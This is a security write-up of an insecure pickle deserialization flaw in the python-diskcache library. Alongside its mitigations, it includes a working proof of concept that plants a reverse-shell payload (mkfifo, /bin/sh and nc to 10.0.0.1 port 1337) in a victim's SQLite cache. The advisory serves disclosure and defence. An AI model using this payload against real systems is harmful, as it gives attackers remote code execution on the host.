Feb 12, 2026
DiskCache uses Python's `pickle` module by default to serialize data to disk. Because `pickle` is inherently unsafe, anyone with write access to the cache directory (e.g., via shared permissions or container volumes) can inject a payload that executes arbitrary code when the application reads from the cache.
A critical insecure deserialization vulnerability in the popular python-diskcache library allows local attackers to achieve arbitrary code execution. By manipulating the underlying SQLite database or cache files, an attacker can trick the application into unpickling a malicious payload.
We all love caching. It's the duct tape of the internet. When your Django app starts wheezing under the load of a thousand users, you slap a cache on it. And if you don't want to spin up a Redis instance because you're cheap (or 'efficient'), you reach for diskcache. It's brilliant, really. It uses SQLite and the local filesystem to store data, claiming to be faster than Redis in some benchmarks. Millions of downloads, used in AWS Lambda, machine learning pipelines, and scraping bots everywhere.
But here's the rub: diskcache needed a way to store complex Python objects—custom classes, functions, the whole nine yards. JSON is too restrictive (it doesn't know what a datetime object is), so the developers reached for the forbidden fruit: Pickle.
If you've been in security for more than five minutes, your blood pressure just spiked. Python's pickle module is a serialization format that effectively allows for arbitrary code execution by design. Trusting pickle is like trusting a stranger to hold your wallet while you go for a swim. In CVE-2025-69872, we find out exactly what happens when that stranger decides to go shopping.
The core philosophy of diskcache seems to be: "If it's on the local disk, it must be safe." This is a classic fallacy. In modern infrastructure—especially containerized environments like Kubernetes—the filesystem is a shared resource. We have shared volumes, /tmp directories with loose permissions, and multi-tenant systems.
The vulnerability is architectural. diskcache essentially creates a SQLite database (cache.db) to manage keys and metadata, and stores the actual values either inside the database or as loose files (.val) in the directory. When you call .get(key), the library fetches the blob and passes it straight to pickle.load().
There is no cryptographic signature. There is no HMAC. There is no sandbox. The library assumes that no one else could possibly write to that directory. If an attacker can modify a .val file or execute a SQL UPDATE query on the cache.db file, they turn the application's next cache retrieval into arbitrary code execution inside the application's own process.
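To make the missing integrity check concrete, here is a minimal sketch of what authenticating a blob before unpickling could look like. It assumes a secret key stored somewhere the attacker cannot read (in particular, not in the cache directory). `sign_blob` and `load_verified` are hypothetical helpers written for this article, not part of diskcache.

```python
import hashlib
import hmac
import pickle

TAG_SIZE = hashlib.sha256().digest_size  # 32 bytes for SHA-256


def sign_blob(secret: bytes, obj) -> bytes:
    """Pickle obj and prepend an HMAC-SHA256 tag computed over the pickled bytes."""
    data = pickle.dumps(obj)
    tag = hmac.new(secret, data, hashlib.sha256).digest()
    return tag + data


def load_verified(secret: bytes, blob: bytes):
    """Unpickle blob only if its tag matches; raise ValueError otherwise."""
    tag, data = blob[:TAG_SIZE], blob[TAG_SIZE:]
    expected = hmac.new(secret, data, hashlib.sha256).digest()
    # compare_digest avoids leaking how many leading bytes matched.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("cache entry failed integrity check")
    return pickle.loads(data)


if __name__ == "__main__":
    key = b"hypothetical-secret-kept-outside-the-cache-dir"
    blob = sign_blob(key, {"user": "alice", "visits": 3})
    print(load_verified(key, blob))

    # Flip one bit, as an attacker editing the file on disk would.
    tampered = blob[:-1] + bytes([blob[-1] ^ 0x01])
    try:
        load_verified(key, tampered)
    except ValueError as exc:
        print("rejected:", exc)
```

The check only helps if it runs before `pickle.loads` ever sees the bytes, and only as long as the key stays out of the attacker's reach.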
Let's crack open diskcache/core.py and look at the horror show. We are looking for the deserialization trigger points. We don't have to look hard.
```python
# diskcache/core.py (Simplified for effect)
def get(self, key, default=None, ...):
    # ... logic to find the file ...
    if mode == MODE_PICKLE:
        try:
            # HERE IS THE DRAGON
            with open(filename, 'rb') as reader:
                return pickle.load(reader)
        except (KeyError, ValueError, pickle.PickleError):
            pass
```

It's naked. Just pickle.load(reader).
The vulnerability also exists when reading keys or values directly from the SQLite database. If the data is small enough, diskcache inlines it into the database blob.
```python
# Inside the fetch logic
val = cursor.execute('SELECT value FROM cache WHERE key=?', (key,)).fetchone()
if val:
    # AND HERE IS ANOTHER DRAGON
    return pickle.loads(val[0])
```

This isn't a bug in the code per se; the code is doing exactly what it was designed to do. The bug is the design itself. It prioritizes the ability to store complex Python objects over the security of the runtime environment.
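For contrast, here is a sketch of a loader that makes the opposite trade-off. It follows the "restricting globals" pattern from the Python pickle documentation: the unpickler refuses to resolve any global that is not on an allowlist. `RestrictedUnpickler`, `restricted_loads`, and the allowlist contents are illustrative assumptions, not something diskcache ships.

```python
import builtins
import io
import pickle

# Hypothetical allowlist: only these builtins may be resolved while loading.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream asks for a global (class or function).
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads, but rejects any global outside the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    # Plain containers never need a global lookup, so they load fine.
    print(restricted_loads(pickle.dumps({"ids": [1, 2, 3], "span": range(3)})))

    # A pickle that references builtins.print is refused before anything runs.
    try:
        restricted_loads(pickle.dumps(print))
    except pickle.UnpicklingError as exc:
        print("rejected:", exc)
```

The cost is exactly the one described above: custom classes stop round-tripping unless each one is added to the allowlist by hand.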
Exploiting this requires a bit of setup, but it's trivial if you have filesystem access. Imagine a scenario where a web application runs as www-data and stores its cache in /var/tmp/django_cache. If that directory is world-writable (a surprisingly common sin), or if we have compromised a low-privilege service that shares that volume, we are in business.
We don't need to overflow a buffer or align a heap spray. We just need to serialize a Python class with a __reduce__ method. This magic method tells the pickler: "Hey, when you unpickle me, don't just restore my data—run this function instead."
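A deliberately harmless sketch shows the mechanism. The class below is hypothetical and does nothing dangerous: its `__reduce__` asks the unpickler to call `sorted` on a list. What matters is that the call happens inside `pickle.loads`, and that the caller gets back whatever the function returned rather than the object that was pickled.

```python
import pickle


class NotWhatItSeems:
    """On unpickling, this object is replaced by the result of sorted([3, 1, 2])."""

    def __reduce__(self):
        # (callable, args): the unpickler calls callable(*args) at load time.
        return (sorted, ([3, 1, 2],))


blob = pickle.dumps(NotWhatItSeems())
result = pickle.loads(blob)

# The function ran during loading; no NotWhatItSeems instance comes back.
print(type(result).__name__, result)  # list [1, 2, 3]
```

Swap `sorted` for any other importable callable and the unpickler will call that instead, which is the whole problem.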
Here is a weaponized Proof of Concept. We create a payload that spawns a reverse shell, and we inject it directly into the SQLite database that diskcache uses.
```python
import pickle
import sqlite3
import os

# 1. Craft the Payload
class ApocalypseNow:
    def __reduce__(self):
        cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1337 >/tmp/f"
        return (os.system, (cmd,))

payload = pickle.dumps(ApocalypseNow())

# 2. Open the Victim's Cache DB
# Assume we found this at /tmp/cache/cache.db
conn = sqlite3.connect('/tmp/cache/cache.db')
cursor = conn.cursor()

# 3. Poison a valid key
# We overwrite an existing key so the next time the app asks for it, BOOM.
target_key = "user_session_12345"

# DiskCache stores keys as BLOBs too, usually pickled.
# We update the VALUE associated with that key.
# (Note: In reality, you might need to pickle the key to match the DB schema)
cursor.execute(
    "UPDATE Cache SET value = ? WHERE rowid = 1",
    (payload,)
)
conn.commit()
conn.close()
print("[+] Cache poisoned. Waiting for victim to wake up...")
```

The next time the victim application runs cache.get("user_session_12345"), the pickle.load() executes our reverse shell command. Game over.
Why is this a high-severity issue? Because caching libraries are often implicitly trusted. Developers treat them as internal, opaque storage. They don't sanitize data coming out of the cache because they assume they put it in.
The consequences are severe. This isn't just about reading data; it's about hijacking the control flow of the application process itself.
The remediation here is straightforward but potentially painful if your application relies on pickling custom objects.
1. Switch to JSON Serialization
DiskCache lets you swap the serializer through the `disk` argument. The safest move is to stop using pickle entirely and switch to the built-in `JSONDisk` class. It only supports standard JSON types (dicts, lists, strings, numbers), but it won't execute code when reading data.
```python
from diskcache import Cache, JSONDisk

# The Safe Way
cache = Cache('/path/to/cache', disk=JSONDisk)
```

2. Strict Filesystem Permissions
If you must use pickle (e.g., you are caching complex NumPy arrays or custom objects), you must treat the cache directory like a private key.
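As a rough illustration of "like a private key", the sketch below creates a cache directory that only its owner can touch, and checks an existing one before use. It assumes a POSIX system (it relies on `os.getuid` and Unix mode bits). `make_private_dir` and `is_private` are hypothetical helpers, not diskcache functions.

```python
import os
import stat
import tempfile


def make_private_dir(path: str) -> str:
    """Create path (if needed) and force its mode to 0700: owner-only access."""
    os.makedirs(path, mode=0o700, exist_ok=True)
    # makedirs applies the umask and leaves pre-existing directories untouched,
    # so set the mode explicitly as well.
    os.chmod(path, 0o700)
    return path


def is_private(path: str) -> bool:
    """True if path is owned by the current user and closed to group and others."""
    st = os.stat(path)
    open_bits = st.st_mode & (stat.S_IRWXG | stat.S_IRWXO)
    return st.st_uid == os.getuid() and open_bits == 0


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as base:
        cache_dir = make_private_dir(os.path.join(base, "cache"))
        print(is_private(cache_dir))

        os.chmod(cache_dir, 0o777)  # simulate the world-writable mistake
        print(is_private(cache_dir))
```

An application could call `is_private` at startup and refuse to open the cache if it returns False. Note that this does nothing against an attacker who runs as the same user or as root.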
3. Monitoring
Set up file integrity monitoring (FIM) on your cache directories. If an external process modifies a .db or .val file, trigger an alarm immediately. That is not normal behavior.
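The core of such a check can be sketched in a few lines: hash every file in the directory, then compare two snapshots. This is an illustration of the idea rather than a replacement for a real FIM tool. `snapshot` and `diff_snapshots` are hypothetical names, and the sketch makes no attempt to tell the application's own writes apart from an intruder's, which a real deployment would have to do.

```python
import hashlib
import os
import tempfile


def snapshot(directory: str) -> dict:
    """Map each file's path (relative to directory) to its SHA-256 hex digest."""
    digests = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            digests[os.path.relpath(path, directory)] = digest
    return digests


def diff_snapshots(before: dict, after: dict) -> dict:
    """Report which files changed, appeared, or disappeared between snapshots."""
    common = before.keys() & after.keys()
    return {
        "changed": sorted(p for p in common if before[p] != after[p]),
        "added": sorted(after.keys() - before.keys()),
        "removed": sorted(before.keys() - after.keys()),
    }


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as cache_dir:
        target = os.path.join(cache_dir, "entry.val")
        with open(target, "wb") as fh:
            fh.write(b"original value")
        baseline = snapshot(cache_dir)

        with open(target, "wb") as fh:  # simulate an out-of-band modification
            fh.write(b"tampered value")
        print(diff_snapshots(baseline, snapshot(cache_dir)))
```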
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

| Product | Affected Versions | Fixed Version |
|---|---|---|
| python-diskcache (Grant Jenks) | <= 5.6.3 | N/A (Requires Config Change) |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-502 |
| Attack Vector | Local (File Manipulation) |
| CVSS | 7.3 (High) |
| Impact | Arbitrary Code Execution |
| Exploit Status | PoC Available |
| Affected Component | diskcache.core.Cache.get() |
The application deserializes untrusted data without sufficiently verifying that the resulting data will be valid.